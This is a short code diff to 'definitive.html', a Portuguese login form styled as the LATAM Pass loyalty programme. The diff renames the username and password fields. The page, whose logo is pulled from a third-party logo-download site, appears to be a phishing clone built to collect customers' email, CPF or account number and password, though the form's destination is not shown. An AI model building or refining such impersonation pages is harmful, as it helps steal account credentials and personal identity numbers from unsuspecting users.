--- a/definitive.html
+++ b/definitive.html
@@ -74,10 +74,10 @@ rik=9EVDOKvltMk8Kg&amp;riu=http%3a%2f%2flogos-download.com%2fwp-content%2fupload
 class="logo">
             <p>Insira seu usuário:</p>
 <p>Dê preferência ao seu número LATAM Pass ao inserir seus dados:</p>
-            <input type="email" name="usuario" placeholder="Email, CPF ou Número de 
+            <input type="email" name="username" placeholder="Email, CPF ou Número de 
 
 cliente">
-            <input type="password" name="senha" placeholder="Senha">
+            <input type="password" name="password" placeholder="Senha">
             <button type="submit">Continuar</button>
         </form>
     </div>
